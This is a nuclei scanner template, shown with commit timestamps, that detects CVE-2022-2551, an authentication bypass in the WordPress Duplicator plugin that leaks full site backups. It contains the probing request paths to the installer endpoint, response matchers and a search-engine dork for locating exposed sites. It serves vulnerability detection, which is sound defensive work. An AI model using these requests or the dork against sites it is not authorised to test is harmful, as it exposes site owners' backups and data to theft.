nuclei-templates/http/cves/2022/CVE-2022-2551.yaml

54 lines
2.0 KiB
YAML
Raw Normal View History

2022-09-03 19:19:55 +00:00
id: CVE-2022-2551
info:
name: WordPress Duplicator <1.4.7 - Authentication Bypass
2022-09-26 17:19:56 +00:00
author: LRTK-CODER
2022-09-03 19:19:55 +00:00
severity: high
description: |
WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 1.4.7.1.
2022-09-03 19:19:55 +00:00
reference:
2022-09-26 17:19:56 +00:00
- https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0
- https://wordpress.org/plugins/duplicator/
2022-09-03 19:19:55 +00:00
- https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551
- https://nvd.nist.gov/vuln/detail/CVE-2022-2551
2022-09-03 19:19:55 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-09-03 19:19:55 +00:00
cve-id: CVE-2022-2551
cwe-id: CWE-425
2023-10-14 11:27:55 +00:00
epss-score: 0.79836
epss-percentile: 0.97945
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
2022-09-26 17:25:43 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: snapcreek
product: duplicator
2023-09-06 11:59:08 +00:00
framework: wordpress
google-query: inurl:/backups-dup-lite/dup-installer/
tags: cve2022,wordpress,wp,wp-plugin,duplicator,wpscan,cve
2022-09-26 17:24:38 +00:00
http:
2022-09-03 19:19:55 +00:00
- method: GET
path:
2022-09-26 17:19:56 +00:00
- "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1"
- "{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"
2022-09-26 17:27:53 +00:00
2022-09-03 19:19:55 +00:00
matchers-condition: and
matchers:
2023-07-11 19:49:27 +00:00
- type: word
2022-09-03 19:19:55 +00:00
part: body
words:
- "<a href='../installer.php'>restart this install process</a>"
2023-07-11 19:49:27 +00:00
condition: and
2022-09-26 17:19:56 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a004730450221009eac6778bb0e051c159003b48d6e29791e59145590ffde9c66eb8bad2e4117c902207ce602c9d505a883e631befb5a79645fe7de1702d069cc2a306bc795895e9bd8:922c64590222798bb761d5b6d8e72950